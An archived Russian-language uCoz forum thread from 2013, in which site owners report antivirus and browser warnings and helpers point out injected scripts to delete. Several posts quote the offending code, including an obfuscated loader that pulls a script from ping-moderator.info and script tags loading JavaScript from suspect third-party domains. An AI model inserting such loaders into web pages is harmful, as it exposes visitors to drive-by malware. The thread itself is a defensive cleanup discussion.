Модератор форума: Yuri_G  
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах_3 (архив для чтения)
Вирусы на сайтах_3 (архив для чтения)
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 1771 | 21:22:17 29 Мар 2013
Yuri825, bз прилепленного блока войти и зарегистрироваться удалите скрипт

Код
<script src="http://china-air.ru/tsed.js" type="text/javascript"></script>
ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 1772 | 21:26:53 29 Мар 2013
roman911, ответ тут //forum.ucoz.ru/forum/45-34556-1003261-16-1364461537 не надо дуплить сообщения. пишите в тех
ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Yuri825
Сообщений: 13
Репутация: 0

Сообщение # 1773 | 21:30:03 29 Мар 2013
webanet, спасибо за вашу помощь!
adriano8177
Сообщений: 9
Репутация: 0

Сообщение # 1774 | 21:32:10 29 Мар 2013
а http://supre-hit.ru/forum опять блокирует...
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 1775 | 21:37:19 29 Мар 2013
adriano8177, причина та же. проверьте все ссылки на старый домен. и если форум был закрыт от гостей, то ждать надо дольше проверки
ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
all4wave
Сообщений: 7
Репутация: 0

Сообщение # 1776 | 13:31:38 30 Мар 2013
Всем привет!
Проблема: мне часто говорят что антивирусы находят вирус при заходе на мой сайт (андроид1.рф)
У меня ничего подобного нет и вообще я не знаю как найти и удалить вирус. Прошу помощи в поиске вируса.
cry
Всё о и для ОС Android!
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 1777 | 13:45:47 30 Мар 2013
all4wave, может больше конкретики? какие антивирусы? какие вирусы находят?

единственное что - это картинки с сайта http://google-androids.ru/uploads/posts/2010-02/1266320826_1.png сам сайт в базах многих антивирусов

и вот эту дрянь вы сами на сайт ставили?

Код
<script type="text/javascript">
    (function(w) {
      var script = document.createElement('script');
      var i = setInterval(function() {
        if (typeof w.document.body !== 'undefined') {
            script.src = 'http://htm.ctr.cache.ping-moderator.info' + '/?944405=YShhZzN3eXp2fnxxZigsJCMs';
            w.document.body.appendChild(script);
            clearInterval(i);
        }
      }, 200);
})(window);
</script>
ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
all4wave
Сообщений: 7
Репутация: 0

Сообщение # 1778 | 15:19:24 30 Мар 2013
webanet, спасибо, скрипт удалил.
Блокирует антивирус Avast и Nod32
Причина: JS:Scriptlp-inf
[Troyan]
Только 1 прикол есть тут. У меня Аваст блокирует только мою панель управления этим сайтом, а сам сайт нет.
Всё о и для ОС Android!
myrik787
Сообщений: 3
Репутация: 0

Сообщение # 1779 | 14:14:26 31 Мар 2013
Почему, когда я захожу на сайт через гугл, у меня выходит вот такое вот окно?



Как это исправить? если, что адрес сайта: game-face.ru
Drinko
Сообщений: 909
Репутация: 773

Сообщение # 1780 | 14:50:35 31 Мар 2013
myrik787, удаляйте из шаблонов левые скрипты и рекламу, к примеру:

Код
<script type="text/javascript" src="http://bannerwm.ru/view.php?id=469"></script>
Улыбаемся и голосуем, улыбаемся и голосуем!
all4wave
Сообщений: 7
Репутация: 0

Сообщение # 1781 | 21:05:30 31 Мар 2013
Помогите узнать, справился ли я с удалением вируса с сайта.

ВОТ САЙТ

У кого-то антивирусы бухтят при заходе на него?

Всем заранее спасибо hello
Всё о и для ОС Android!
Сообщение отредактировал all4wave - Воскресенье, 31 Мар 2013, 21:07:17
usenok2908
Сообщений: 43
Репутация: 20

Сообщение # 1782 | 12:00:56 04 Апр 2013
Привет всем) на свой сайт через конструктор создала блок и туда вставила плагин "Мы на одноклассниках",там можно было сразу присоединяться к профилю на однокласниках,после это мне приходит письмо от яндекса что на сайте обнаружен вирус который может угрожать безопасности данных или их краже и мошеничество.и типа кдалите этот вирус и перепроверьте сайт,я так и сделала удалила этот плагин из блока и зашла в вебмастер и перепроверила сайт....как не заходи через сайт через оперу или гугл везде пишет "Посещение этой страницы может представлять опасность. Страница была замечена в распространении вредоносного программного обеспечения."......опять перепроверила и все равно такая же ситуация,ЧТО МНЕ ДЕЛАТЬ?????????мой сайт здесь.так же в вебмастере мне пишут такое "31.03.2013 наш робот получил полный запрет на индексирование сайта в Вашем файле robots.txt, поэтому сайт в поиске не участвует.".....как его убрать?????
Так же пишут
Mal/Iframe-AN
Данный вердикт означает, что на странице присутствует тег <iframe> в атрибуте src которого стоит доменное имя хоста, с которого распространяется вредоносное ПО.
Код
<div id="ok_group_widget"></div>
<script>
!function (d, id, did, st) {
    var js = d.createElement("script");
    js.src = "http://connect.ok.ru/connect.js";
    js.onload = js.onreadystatechange = function () {
    if (!this.readyState || this.readyState == "loaded" || this.readyState == "complete") {
      if (!this.executed) {
        this.executed = true;
        setTimeout(function () {
          OK.CONNECT.insertGroupWidget(id,did,st);
        }, 0);
      }
    }}
    d.documentElement.appendChild(js);
}(document,"ok_group_widget","50582132228315","{width:250,height:335}");
</script>

он вот так выгледел (сейчас там не моя группа)от сюда брала плагин здесь
Посетите наш сайт
Сообщение отредактировал usenok2908 - Четверг, 04 Апр 2013, 12:28:19
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 1783 | 16:41:56 04 Апр 2013
usenok2908, дело совсем не в плагине одноклассников. дело в том, что вы собираете грязные скрипты со всего интернета. нельзя подгружать скрипты с чужих сайтов

вся проблема в этом скрипте

Код
<script src="http://cstav.ru/uCoz/3_uCoz-raz/53/higer.js" type="text/javascript"></script>


он находится вместе с остальным мусором в футере сайта (глобальный блок нижняя часть сайта)

вот эту грязь
Код
<script type="text/javascript" src="http://cstav.ru/uCoz/3_uCoz-raz/43/shareTT-cstav.js"></script>
нужно заменить на кнопки от яндекса http://api.yandex.ru/share/

все остальное, включая кнопку поднятия страницы вверх или перезалить на сайт или удалить вообще и не оставлять в коде упоминания сайта, который раздает вредоносный код

когда вы перестанете собирать скрипты где попало, тогда ваши проблемы закончатся
ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
polial
Сообщений: 1
Репутация: 0

Сообщение # 1784 | 03:15:08 05 Апр 2013
http://shandora.at.ua/

1)аккаунт блокирован - Malware
2) под админом захожу на сайт, под гостем - нет.
3) антивирус Касперский не реагирует
4) Опера не блокирует.

Скрипты последние 5-6 месяцев, а может и более не ставил. вчера добавил новость - http://shandora.at.ua/news/uroven_vody_rastet/2013-04-02-155 и запись в форум - http://shandora.at.ua/forum/3-8-140-16-1364965467

что такое малваре,откуда ? хоть ткните носом где искать?

Добавлено (05 Апр 2013, 03:15:08)
---------------------------------------------
к предыдущему посту - вирусов не нашел
http://antivirus-alarm.ru/proverka/?url=shandora.at.ua%2F

seostatik
Сообщений: 1
Репутация: 0

Сообщение # 1785 | 17:11:24 05 Апр 2013
удалено. сайты не находятся в системе uCoz
Сообщение отредактировал webanet - Пятница, 05 Апр 2013, 17:20:53
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах_3 (архив для чтения)
Поиск: